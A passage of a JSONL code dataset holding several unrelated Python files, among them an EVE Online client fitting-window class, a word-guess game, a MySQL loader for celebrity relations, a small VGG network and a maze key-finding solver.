a context manager, this class switches to the default\n mode on enter and exit.\n \"\"\"\n ...\n\n @abstractmethod\n def get_mode(self) -> BootMode:\n \"\"\"Return the current boot mode.\"\"\"\n ...\n\n @abstractmethod\n def set_mode(self, value: BootMode) -> None:\n \"\"\"Set the boot mode.\"\"\"\n ...\n\n @contextmanager\n def scoped(self, value: BootMode) -> Iterator[None]:\n \"\"\"Switch to the given boot mode while in the context manager.\"\"\"\n previous_mode = self.get_mode()\n try:\n self.set_mode(value)\n yield\n finally:\n self.set_mode(previous_mode)\n\n def __enter__(self) -> AbstractBootModeControl:\n self.set_mode(self.default_mode)\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n self.set_mode(self.default_mode)\n","repo_name":"sbtinstruments/wright","sub_path":"wright/device/control/boot_mode/_abc.py","file_name":"_abc.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37019106011","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\fitting\\fittingWnd.py\r\nfrom carbonui import const as uiconst\r\nfrom carbonui.primitives.container import Container\r\nfrom carbonui.primitives.containerAutoSize import ContainerAutoSize\r\nfrom carbonui.primitives.layoutGrid import LayoutGrid\r\nfrom carbonui.util.various_unsorted import SetOrder\r\nfrom eve.client.script.ui.control.buttons import ButtonIcon\r\nfrom eve.client.script.ui.control.eveLabel import EveLabelMediumBold, EveLabelMedium\r\nfrom eve.client.script.ui.control.eveWindow import Window\r\nfrom eve.client.script.ui.shared.fitting.baseFitting import Fitting\r\nfrom eve.client.script.ui.shared.fitting.cleanShipButton import CleanShipButton\r\nfrom eve.client.script.ui.shared.fitting.fittingController import ShipFittingController\r\nfrom eve.client.script.ui.shared.fitting.fittingUtil import GetXtraColor2, GetBaseShapeSize, PANEL_WIDTH, FONTCOLOR_DEFAULT\r\nfrom eve.client.script.ui.shared.fitting.statsPanel import StatsPanel\r\nfrom eve.client.script.ui.shared.skins.controller import FittingSkinPanelController\r\nfrom eve.client.script.ui.shared.skins.skinPanel import SkinPanel\r\nfrom eve.client.script.ui.station.fitting.fittingTooltipUtils import SetFittingTooltipInfo\r\nfrom eve.client.script.ui.station.fitting.minihangar import CargoCargoSlots, CargoDroneSlots\r\nfrom eve.common.script.sys.eveCfg import GetActiveShip\r\nfrom localization import GetByLabel\r\nimport locks\r\nimport uthread\r\nWND_HEIGHT = 560\r\nANIM_DURATION = 0.25\r\n\r\nclass FittingWindow2(Window):\r\n __guid__ = 'form.FittingWindow2'\r\n __notifyevents__ = ['OnSetDevice']\r\n default_topParentHeight = 0\r\n default_fixedHeight = WND_HEIGHT\r\n default_windowID = 'fitting2'\r\n default_captionLabelPath = 'Tooltips/StationServices/ShipFitting'\r\n default_descriptionLabelPath = 'Tooltips/StationServices/ShipFitting_description'\r\n default_iconNum = 'res:/ui/Texture/WindowIcons/fitting.png'\r\n\r\n def ApplyAttributes(self, attributes):\r\n Window.ApplyAttributes(self, attributes)\r\n self.MakeUnResizeable()\r\n self.HideHeaderFill()\r\n self.windowReady = False\r\n self.controller = None\r\n itemID = attributes.shipID or GetActiveShip()\r\n self._layoutLock = locks.Lock()\r\n self.controller = ShipFittingController(itemID=itemID)\r\n self.controller.on_stats_changed.connect(self.UpdateStats)\r\n self.controller.on_new_itemID.connect(self.UpdateStats)\r\n self.ConstructLayout()\r\n\r\n def ConstructLayout(self):\r\n with self._layoutLock:\r\n self.sr.main.Flush()\r\n width = PANEL_WIDTH if self.IsLeftPanelExpanded() else 0\r\n skinController = FittingSkinPanelController(fitting=self.controller)\r\n self.leftPanel = Container(parent=self.sr.main, align=uiconst.TOLEFT, width=width, padding=(10, 0, 0, 10))\r\n self.cleanShipBtn = CleanShipButton(parent=self.leftPanel, align=uiconst.TOBOTTOM, controller=self.controller)\r\n self.skinPanel = SkinPanel(parent=self.leftPanel, align=uiconst.TOALL, controller=skinController, settingsPrefix='Fitting_SkinPanel', logContext='FittingWindow')\r\n if self.IsLeftPanelExpanded():\r\n uthread.new(self.skinPanel.Load)\r\n width = PANEL_WIDTH if self.IsRightPanelExpanded() else 0\r\n self.rightPanel = StatsPanel(name='rightside', parent=self.sr.main, align=uiconst.TORIGHT, width=width, idx=0, padding=(0, 0, 10, 10), controller=self.controller)\r\n mainCont = Container(name='mainCont', parent=self.sr.main, top=-8)\r\n self.overlayCont = Container(name='overlayCont', parent=mainCont)\r\n self.ConstructPanelExpanderBtn()\r\n self.ConstructInventoryIcons()\r\n self.ConstructPowerAndCpuLabels()\r\n Fitting(parent=mainCont, owner=self, controller=self.controller)\r\n self.windowReady = True\r\n self.width = self.GetWindowWidth()\r\n self.SetFixedWidth(self.width)\r\n self.UpdateStats()\r\n\r\n def ConstructInventoryIcons(self):\r\n cargoDroneCont = ContainerAutoSize(name='cargoDroneCont', parent=self.overlayCont, align=uiconst.BOTTOMLEFT, width=110, left=const.defaultPadding, top=4)\r\n cargoSlot = CargoCargoSlots(name='cargoSlot', parent=cargoDroneCont, align=uiconst.TOTOP, height=32, controller=self.controller)\r\n SetFittingTooltipInfo(cargoSlot, 'CargoHold')\r\n droneSlot = CargoDroneSlots(name='cargoSlot', parent=cargoDroneCont, align=uiconst.TOTOP, height=32, controller=self.controller)\r\n SetFittingTooltipInfo(droneSlot, 'DroneBay')\r\n\r\n def IsRightPanelExpanded(self):\r\n return settings.user.ui.Get('fittingPanelRight', 1)\r\n\r\n def IsLeftPanelExpanded(self):\r\n return settings.user.ui.Get('fittingPanelLeft2', 1)\r\n\r\n def ConstructPanelExpanderBtn(self):\r\n if self.IsLeftPanelExpanded():\r\n texturePath = 'res:/UI/Texture/Icons/73_16_196.png'\r\n tooltipName = 'CollapseSidePane'\r\n else:\r\n texturePath = 'res:/UI/Texture/Icons/73_16_195.png'\r\n tooltipName = 'ExpandSidePane'\r\n self.toggleLeftBtn = ButtonIcon(texturePath=texturePath, parent=self.overlayCont, align=uiconst.CENTERLEFT, pos=(2, 0, 16, 16), func=self.ToggleLeftPanel)\r\n SetFittingTooltipInfo(self.toggleLeftBtn, tooltipName=tooltipName, includeDesc=False)\r\n if self.IsRightPanelExpanded():\r\n texturePath = 'res:/UI/Texture/Icons/73_16_195.png'\r\n tooltipName = 'CollapseSidePane'\r\n else:\r\n texturePath = 'res:/UI/Texture/Icons/73_16_196.png'\r\n tooltipName = 'ExpandSidePane'\r\n self.toggleRightBtn = ButtonIcon(texturePath=texturePath, parent=self.overlayCont, align=uiconst.CENTERRIGHT, pos=(2, 0, 16, 16), func=self.ToggleRight)\r\n SetFittingTooltipInfo(self.toggleRightBtn, tooltipName=tooltipName, includeDesc=False)\r\n\r\n def ToggleRight(self, *args):\r\n isExpanded = not self.IsRightPanelExpanded()\r\n settings.user.ui.Set('fittingPanelRight', isExpanded)\r\n self._fixedWidth = self.GetWindowWidth()\r\n self.toggleRightBtn.state = uiconst.UI_DISABLED\r\n if isExpanded:\r\n self.toggleRightBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_195.png')\r\n self.toggleRightBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/CollapseSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.rightPanel, 'width', self.rightPanel.width, PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.rightPanel, self.rightPanel.opacity, 1.0, duration=ANIM_DURATION, sleep=True)\r\n else:\r\n self.toggleRightBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_196.png')\r\n self.toggleRightBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/ExpandSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.rightPanel, 'width', self.rightPanel.width, 0, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.rightPanel, self.rightPanel.opacity, 0.0, duration=ANIM_DURATION, sleep=True)\r\n self.toggleRightBtn.state = uiconst.UI_NORMAL\r\n\r\n def ToggleLeftPanel(self, *args):\r\n isExpanded = not self.IsLeftPanelExpanded()\r\n settings.user.ui.Set('fittingPanelLeft2', isExpanded)\r\n self._fixedWidth = self.GetWindowWidth()\r\n self.toggleLeftBtn.state = uiconst.UI_DISABLED\r\n if isExpanded:\r\n self.toggleLeftBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_196.png')\r\n self.toggleLeftBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/CollapseSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self, 'left', self.left, self.left - PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.leftPanel, 'width', self.leftPanel.width, PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.leftPanel, self.leftPanel.opacity, 1.0, duration=ANIM_DURATION, sleep=True)\r\n uthread.new(self.skinPanel.Load)\r\n else:\r\n self.toggleLeftBtn.SetTexturePath('res:/UI/Texture/Icons/73_16_195.png')\r\n self.toggleLeftBtn.tooltipPanelClassInfo.headerText = GetByLabel('Tooltips/FittingWindow/ExpandSidePane')\r\n uicore.animations.MorphScalar(self, 'width', self.width, self._fixedWidth, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self, 'left', self.left, self.left + PANEL_WIDTH, duration=ANIM_DURATION)\r\n uicore.animations.MorphScalar(self.leftPanel, 'width', self.leftPanel.width, 0, duration=ANIM_DURATION)\r\n uicore.animations.FadeTo(self.leftPanel, self.leftPanel.opacity, 0.0, duration=ANIM_DURATION, sleep=True)\r\n self.toggleLeftBtn.state = uiconst.UI_NORMAL\r\n\r\n def GetWindowWidth(self):\r\n width = GetBaseShapeSize() + 16\r\n if self.IsLeftPanelExpanded():\r\n width += PANEL_WIDTH\r\n if self.IsRightPanelExpanded():\r\n width += PANEL_WIDTH\r\n return width\r\n\r\n def OnSetDevice(self):\r\n if self.controller and self.controller.GetItemID():\r\n uthread.new(self.ConstructLayout)\r\n\r\n def InitializeStatesAndPosition(self, *args, **kw):\r\n current = self.GetRegisteredPositionAndSize()\r\n default = self.GetDefaultSizeAndPosition()\r\n fixedHeight = self._fixedHeight\r\n fixedWidth = self.GetWindowWidth()\r\n Window.InitializeStatesAndPosition(self, *args, **kw)\r\n if fixedWidth is not None:\r\n self.width = fixedWidth\r\n self._fixedWidth = fixedWidth\r\n if fixedHeight is not None:\r\n self.height = fixedHeight\r\n self._fixedHeight = fixedHeight\r\n if list(default) == list(current)[:4]:\r\n settings.user.ui.Set('defaultFittingPosition', 1)\r\n dw = uicore.desktop.width\r\n dh = uicore.desktop.height\r\n self.left = (dw - self.width) / 2\r\n self.top = (dh - self.height) / 2\r\n self.MakeUnpinable()\r\n self.Unlock()\r\n uthread.new(uicore.registry.SetFocus, self)\r\n self._collapseable = 0\r\n\r\n def _OnClose(self, *args):\r\n settings.user.ui.Set('defaultFittingPosition', 0)\r\n\r\n def MouseDown(self, *args):\r\n uthread.new(uicore.registry.SetFocus, self)\r\n SetOrder(self, 0)\r\n\r\n def GhostFitItem(self, ghostItem = None):\r\n if not self.controller:\r\n return\r\n uthread.new(self.controller.SetGhostFittedItem, ghostItem)\r\n\r\n def OnStartMinimize_(self, *args):\r\n sm.ChainEvent('ProcessFittingWindowStartMinimize')\r\n\r\n def OnEndMinimize_(self, *args):\r\n sm.ChainEvent('ProcessFittingWindowEndMinimize')\r\n\r\n def OnUIScalingChange(self, *args):\r\n pass\r\n\r\n def UpdateStats(self):\r\n if not self.windowReady:\r\n return\r\n self.UpdateCPU()\r\n self.UpdatePower()\r\n self.UpdateCalibration()\r\n\r\n def ConstructPowerAndCpuLabels(self):\r\n powerGridAndCpuCont = LayoutGrid(parent=self.overlayCont, columns=1, state=uiconst.UI_PICKCHILDREN, align=uiconst.BOTTOMRIGHT, top=10, left=10)\r\n cpu_statustextHeader = EveLabelMediumBold(text=GetByLabel('UI/Fitting/FittingWindow/CPUStatusHeader'), name='cpu_statustextHeader', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=cpu_statustextHeader, tooltipName='CPU')\r\n powerGridAndCpuCont.AddCell(cpu_statustextHeader)\r\n self.cpu_statustext = EveLabelMedium(text='', name='cpu_statustext', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=self.cpu_statustext, tooltipName='CPU')\r\n powerGridAndCpuCont.AddCell(self.cpu_statustext)\r\n powerGridAndCpuCont.AddCell(cellObject=Container(name='spacer', align=uiconst.TOTOP, height=10))\r\n power_statustextHeader = EveLabelMediumBold(text=GetByLabel('UI/Fitting/FittingWindow/PowergridHeader'), name='power_statustextHeader', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n SetFittingTooltipInfo(targetObject=power_statustextHeader, tooltipName='PowerGrid')\r\n powerGridAndCpuCont.AddCell(power_statustextHeader)\r\n self.power_statustext = EveLabelMedium(text='', name='power_statustext', state=uiconst.UI_NORMAL, align=uiconst.TOPRIGHT)\r\n powerGridAndCpuCont.AddCell(self.power_statustext)\r\n SetFittingTooltipInfo(targetObject=self.power_statustext, tooltipName='PowerGrid')\r\n self.calibration_statustext = EveLabelMedium(text='', parent=self.overlayCont, name='calibrationstatustext', pos=(8, 50, 0, 0), idx=0, state=uiconst.UI_NORMAL)\r\n SetFittingTooltipInfo(targetObject=self.calibration_statustext, tooltipName='Calibration')\r\n\r\n def UpdateCPU(self):\r\n cpuLoad = self.controller.GetCPULoad()\r\n cpuOutput = self.controller.GetCPUOutput()\r\n self.cpu_statustext.text = GetByLabel('UI/Fitting/FittingWindow/CpuStatusText', cpuLoad=cpuOutput.value - cpuLoad.value, cpuOutput=cpuOutput.value, startColorTag1='' % hex(GetXtraColor2(cpuLoad.diff)), startColorTag2='' % hex(GetXtraColor2(cpuOutput.diff)), endColorTag='')\r\n\r\n def UpdatePower(self):\r\n powerLoad = self.controller.GetPowerLoad()\r\n powerOutput = self.controller.GetPowerOutput()\r\n self.power_statustext.text = GetByLabel('UI/Fitting/FittingWindow/PowerStatusText', powerLoad=powerOutput.value - powerLoad.value, powerOutput=powerOutput.value, startColorTag3='' % hex(GetXtraColor2(powerLoad.diff)), startColorTag4='' % hex(GetXtraColor2(powerOutput.diff)), endColorTag='')\r\n\r\n def UpdateCalibration(self):\r\n calibrationLoad = self.controller.GetCalibrationLoad()\r\n calibrationOutput = self.controller.GetCalibrationOutput()\r\n self.calibration_statustext.text = GetByLabel('UI/Fitting/FittingWindow/CalibrationStatusText', calibrationLoad=calibrationOutput.value - calibrationLoad.value, calibrationOutput=calibrationOutput.value, startColorTag1='' % hex(GetXtraColor2(calibrationLoad.diff)), startColorTag2='' % FONTCOLOR_DEFAULT, endColorTag='')\r\n\r\n def Close(self, setClosed = False, *args, **kwds):\r\n Window.Close(self, setClosed, *args, **kwds)\r\n self.controller.Close()\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/shared/fitting/fittingWnd.py","file_name":"fittingWnd.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25248217551","text":"import random\nfrom SecretWord import SecretWord\n\nclass WordGuess: \n\n def __init__(self, wordDic):\n self.words_dict = wordDic\n self.guess_words = [] #constructor,initiation\n self.guesses = 0\n self.random_word = ''\n self.current_guess = ''\n\n def play(self):\n \"\"\" Plays out a single full game of Word Guess \"\"\" #play game\n self.random_word = self.chooseSecretWord() #choose random word\n print('A secret word has been randomly chosen!') \n acontainer = SecretWord() #container(instance) to hold random word\n sorted_container = SecretWord() #sorted container or instance\n acontainer.setWord(self.random_word) #make linked list \n sorted_container.setWord(self.random_word) # '' ''\n string1 = str(acontainer) #str of original random word\n string2 = sorted_container.sort()\n string2 = str(sorted_container) #str of sorted word\n find_distance = self.editDistance(string1,string2,len(string1),len(string2)) #find edit distance\n alloted_guesses = 2*find_distance #find the alloted number of guesse (*2)\n if alloted_guesses < 5:\n alloted_guesses = 5\n elif alloted_guesses > 15:\n alloted_guesses = 15 \n self.guesses = int(alloted_guesses)\n while self.guesses > 0 and acontainer.isSolved() == False:\n print('You have %d guesses remaining' % (self.guesses)) #if user hasnt guessed it yet loop\n acontainer.printProgress() #print progress\n self.getGuess() #get guess\n acontainer.update(self.current_guess) #update\n if self.current_guess not in string1 and self.current_guess != '*': #if wrong guess\n self.guesses = self.guesses - 1 #deduct\n if self.guesses > 0 and acontainer.isSolved() == True: #if successfully solved\n print('You solved the puzzle!')\n print('The secret word was: %s ' % (str(acontainer)))\n elif self.guesses == 0: #if failed\n print('You have run out of guesses\\nGame Over')\n print('The secret word was: %s ' % (str(acontainer)))\n self.guess_words = []\n self.guesses = 0 #reset\n self.random_word = ''\n self.current_guess = ''\n \n \n\n def chooseSecretWord(self):\n \"\"\" Chooses the secret word that will be guessed \"\"\" #choose a random word from the dict\n item = random.choice(list(self.words_dict))\n return str(item ) \n\n def editDistance(self, s1, s2,length1,length2): # edit distance with length1 of string1 and length2 of string 2 ,for later recursion\n \"\"\" Recursively returns the total number of insertions and deletions required to convert S1 into S2 \"\"\" \n if length1 == 0: #if first string is empty,return second string value since its being totally transferred\n return length2\n\n if length2 == 0: #vice versa\n return length1\n \n \n if s1[length1-1]==s2[length2-1]: \n return self.editDistance(s1,s2,length1-1,length2-1) \n \n \n #recursively find the distance for eahc operation and find the minimum\n return 1 + min(self.editDistance(s1, s2, length1, length2-1), # Insert \n self.editDistance(s1, s2, length1-1, length2)) # Remove \n \n \n \n\n def getGuess(self): \n \"\"\" Queries the user to guess a character in the secret word \"\"\"\n ask = True #ask loop\n while ask: \n user_input = input('Enter a character that has not been guessed or * for a hint: ')\n self.current_guess = str(user_input)\n if user_input == '*': #if asked for hint\n hint = self.words_dict[self.random_word]\n print('Hint: %s' % (hint)) #show hint and deduct 1\n self.guesses = self.guesses - 1\n ask = False\n elif self.current_guess not in self.guess_words: #if guess is not repeated\n self.guess_words.append(self.current_guess) #add to guesses list\n ask = False\n elif user_input in self.guess_words: #if guess is repeated\n print('Invalid guess. You have already guessed this letter.')\n ","repo_name":"Faiyaz42/Resume-Projects-OLD","sub_path":"Hangman/WordGuess.py","file_name":"WordGuess.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21850153145","text":"import pymysql\nimport pandas as pd\nimport time\n\ndb = pymysql.connect(host='localhost',user='root',passwd='root')\ncursor = db.cursor()\n#创建数据库\ncursor.execute(\"create database if not exists star_relation;\")\ncursor.execute(\"use star_relation;\")\n\ndef is_valid_date(strdate):\n '''判断是否是一个有效的日期字符串'''\n try:\n time.strptime(strdate, \"%Y-%m-%d\")\n return True\n except:\n return False\n\n# 创建明星表\nsql_create_star = \"\"\"create table if not exists 明星(\n id int not null primary key auto_increment,\n name varchar(255),\n image varchar(255),\n homeland varchar(255) default null, \n weight varchar(255) default null,\n birth date default null,\n baike_url varchar(255)\n );\"\"\"\ncursor.execute(sql_create_star)\n# 写入明星数据\nstars = pd.read_csv('./data/data/star_infos_new2.csv')\nfor _,curr_star in stars.iterrows():\n if is_valid_date(curr_star['birth']):\n sql_insert_star = \"insert into 明星(name, image, homeland, weight, birth, baike_url) VALUE ('{}','{}','{}','{}','{}','{}')\".format(curr_star['name'],curr_star['image'],curr_star['homeland'],curr_star['weight'],curr_star['birth'],curr_star['baike_url'])\n else:\n sql_insert_star = \"insert into 明星(name, image, homeland, weight, baike_url) VALUE ('{}','{}','{}','{}','{}')\".format(curr_star['name'],curr_star['image'],curr_star['homeland'],curr_star['weight'],curr_star['baike_url'])\n # print(sql_insert_star)\n cursor.execute(sql_insert_star)\n\n# 创建不同关系表\nstar_relations = pd.read_csv('./data/data/all_star_relations.csv')\nrelations = star_relations['relation'].unique()\nrelations\nfor relation in relations:\n sql_create_relation = \"\"\"create table if not exists {}(\n id int not null primary key auto_increment,\n star_subject_id int references star(id),\n star_object_id int references star(id)\n );\"\"\".format(relation)\n cursor.execute(sql_create_relation)\n curr_star_relations = star_relations.loc[star_relations['relation'] == relation]\n # 写入当前关系数据\n for _,curr_star_relation in curr_star_relations.iterrows():\n cursor.execute('select id from 明星 where name = \"{}\"'.format(curr_star_relation['subject']))\n star_subject_id = cursor.fetchone()[0]\n cursor.execute('select id from 明星 where name = \"{}\"'.format(curr_star_relation['object']))\n star_object_id = cursor.fetchone()[0]\n sql_insert_relation = 'insert into {}(star_subject_id,star_object_id) value ({},{})'.format(relation,str(star_subject_id),str(star_object_id))\n cursor.execute(sql_insert_relation)\n\ndb.commit()\ndb.close()\nprint('End================================')\n\n","repo_name":"lxmliu2002/Practice_and_Training","sub_path":"submit/Week 2/mysql/star_relations_mysql.py","file_name":"star_relations_mysql.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37516271899","text":"N = int(input())\ns = input().split()\ns = list(map(int, s))\nx = set()\ny = set()\n\nfor z in s:\n\n if z in x:\n y.add(z)\n else:\n x.add(z)\nprint(sum(x) - sum(y))\n","repo_name":"SupremeSadat/HackerRank","sub_path":"Python Solutions/Sets/The Captain's Room.py","file_name":"The Captain's Room.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41567116086","text":"import qrcode\nimport pickle\nimport random\n\nclass ImageSample:\n def __init__(self, img_sample, wrong_authors, cur_score):\n self.title = img_sample['title']\n self.year = img_sample['year']\n authors = []\n authors.append(img_sample['creator'])\n for wrong_author in wrong_authors:\n authors.append(wrong_author)\n random.shuffle(authors)\n self.correct_id = authors.index(img_sample['creator'])\n self.authors = authors[:self.correct_id] + authors[self.correct_id:]\n self.picture_uri = img_sample['site']\n self.img_link = img_sample['uri']\n self.cur_score = cur_score\n \n def get_qr_code_image(self):\n return qrcode.make(self.picture_uri)\n\n\nclass SampleGenerator:\n def __init__(self):\n self.image_data = pickle.load(open('data/new_images.pickle', 'rb'))\n self.authors = frozenset([x['creator'] for x in self.image_data])\n \n def get_random_sample(self, cur_score=0):\n img_id = random.randint(0, len(self.image_data) - 1)\n wrong_authors = random.sample(self.authors - frozenset([self.image_data[img_id]['creator']]), 2)\n return ImageSample(self.image_data[img_id], wrong_authors, cur_score)\n\n# gen = SampleGenerator()\n# sample = gen.get_random_sample()\n\n","repo_name":"Alpus/jcd","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72429256165","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom nets import selu\nimport scipy.io as sio\nslim = tf.contrib.slim\n\ndef vgg16_small_arg_scope(weight_decay=0.0005):\n with slim.arg_scope([slim.conv2d],\n weights_initializer=tf.contrib.layers.variance_scaling_initializer(),\n biases_initializer=tf.zeros_initializer(),\n weights_regularizer=slim.l2_regularizer(weight_decay)) as arg_sc:\n return arg_sc\n\ndef vgg16_small(image, is_training=False, val = False, lr = None, prediction_fn=slim.softmax,scope='vgg13_std'):\n with tf.variable_scope(scope, 'vgg16_std', [image]):\n# layer = sio.loadmat('/home/dmsl/nas/share/personal_lsh/training/cifar100/vanila/vgg6/highest.mat')\n with tf.variable_scope('block0'):\n ff = slim.conv2d(image, 64, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val) \n ff = slim.max_pool2d(ff, [3, 3], 2, scope='pool')\n with tf.variable_scope('block1'):\n conv = slim.conv2d(ff, 128, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n conv = slim.max_pool2d(conv, [3, 3], 2, scope='pool')\n with tf.variable_scope('block2'):\n conv = slim.conv2d(conv, 256, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n# conv = slim.max_pool2d(conv, [2, 2], 2, scope='pool')\n with tf.variable_scope('block3'):\n conv = slim.conv2d(conv, 512, [3, 3], 1, padding = 'VALID', activation_fn=tf.nn.relu,\n scope='conv0', trainable=is_training, reuse=val)\n# conv = slim.max_pool2d(conv, [2, 2], 2, scope='pool')\n\n conv = tf.contrib.layers.flatten(conv)\n fc1 = slim.fully_connected(conv, 1024, activation_fn=tf.nn.relu,\n# weights_initializer =tf.constant_initializer(layer['fc1w']),\n# biases_initializer =tf.constant_initializer(layer['fc1b']),\n trainable=is_training, scope = 'full1', reuse = val)\n fc = slim.dropout(fc1,0.5,is_training=is_training)\n logits = slim.fully_connected(fc, 100, activation_fn=None,\n# weights_initializer =tf.constant_initializer(layer['fc2w']),\n# biases_initializer =tf.constant_initializer(layer['fc2b']),\n trainable=is_training, scope = 'full3', reuse = val)\n \n \n end_points = {}\n end_points['Logits'] = logits\n end_points['map'] = ff\n #end_points['Predictions'] = prediction_fn(logits, scope='Predictions')\n return end_points\nvgg16_small.default_image_size = 32\n","repo_name":"InhaDeeplearningGroup/Academic_research","sub_path":"LSH/tensorflow_slim/nets/vgg16_small.py","file_name":"vgg16_small.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"20797163235","text":"import copy\n\n\nLETTERS_CAPITAL = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nLETTERS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z']\n\n\nclass KeyFinder:\n def __init__(self, file, part2 = False):\n self.labyrinth = {}\n self.position = (0, 0)\n self.keys = {}\n self.doors = {}\n self.min_total_step = 1000000\n self.paths = {}\n self.random_walks = {}\n self.read_file(file)\n if part2:\n self.change_maze()\n self.find_all_paths()\n self.memoiz = {}\n\n def read_file(self, file):\n file1 = open(file, 'r')\n lines = file1.readlines()\n y = 0\n for line in lines:\n for x in range(len(line)):\n self.labyrinth[x, y] = line[x]\n if line[x] == \"@\":\n self.keys[line[x]] = (x, y)\n self.position = (x, y)\n self.labyrinth[x, y] = '.'\n elif line[x] in LETTERS_CAPITAL:\n self.doors[line[x]] = (x, y)\n elif line[x] in LETTERS:\n self.keys[line[x]] = (x, y)\n y += 1\n\n def find_shortest_path(self, obtained_keys: list, current_key):\n if (current_key + ''.join(obtained_keys)) in self.memoiz:\n return self.memoiz[current_key + ''.join(obtained_keys)]\n\n random_walk = self.random_walks[current_key]\n min_next_step = 100000000\n ordered_keys = []\n for key in random_walk:\n if key not in obtained_keys:\n possible_path = [element[0] for element in random_walk[key] if len(set(element[1]) - set(obtained_keys)) == 0]\n if possible_path:\n new_step = sorted(possible_path)[0]\n (next_step, next_ordered_keys) = self.find_shortest_path(sorted(set(obtained_keys).union(set(key))), key)\n step = next_step + new_step\n if step < min_next_step:\n ordered_keys = [key] + next_ordered_keys\n min_next_step = step\n\n if min_next_step == 100000000:\n min_next_step = 0\n\n self.memoiz[current_key + ''.join(obtained_keys)] = (min_next_step, ordered_keys)\n return (min_next_step, ordered_keys)\n\n def find_all_paths(self):\n for key in self.keys:\n random_walk = RandomWalk(self.labyrinth, self.keys[key])\n self.random_walks[key] = random_walk.start_random_walk()\n\n def change_maze(self):\n self.keys[\"@\"] = (self.position[0] - 1, self.position[1] + 1)\n self.keys[\"!\"] = (self.position[0] + 1, self.position[1] + 1)\n self.keys[\"?\"] = (self.position[0] + 1, self.position[1] - 1)\n self.keys[\"%\"] = (self.position[0] - 1, self.position[1] - 1)\n\n self.labyrinth[(self.position[0], self.position[1])] = \"#\"\n self.labyrinth[(self.position[0] - 1, self.position[1])] = \"#\"\n self.labyrinth[(self.position[0] + 1, self.position[1])] = \"#\"\n self.labyrinth[(self.position[0], self.position[1] + 1)] = \"#\"\n self.labyrinth[(self.position[0], self.position[1] - 1)] = \"#\"\n\n def find_shortest_path_part2(self, obtained_keys: list, current_keys: list):\n if (''.join(current_keys) + ''.join(obtained_keys)) in self.memoiz:\n return self.memoiz[''.join(current_keys) + ''.join(obtained_keys)]\n\n min_next_step = 100000000\n ordered_keys = []\n for i in range(4):\n current_key = current_keys[i]\n random_walk = self.random_walks[current_key]\n for key in random_walk:\n if key not in obtained_keys:\n possible_path = [element[0] for element in random_walk[key] if len(set(element[1]) - set(obtained_keys)) == 0]\n if possible_path:\n new_step = sorted(possible_path)[0]\n next_keys = copy.deepcopy(current_keys)\n next_keys[i] = key\n (next_step, next_ordered_keys) = self.find_shortest_path_part2(sorted(set(obtained_keys).union(set(key))), next_keys)\n step = next_step + new_step\n if step < min_next_step:\n ordered_keys = [key] + next_ordered_keys\n min_next_step = step\n\n if min_next_step == 100000000:\n min_next_step = 0\n\n self.memoiz[''.join(current_keys) + ''.join(obtained_keys)] = (min_next_step, ordered_keys)\n return 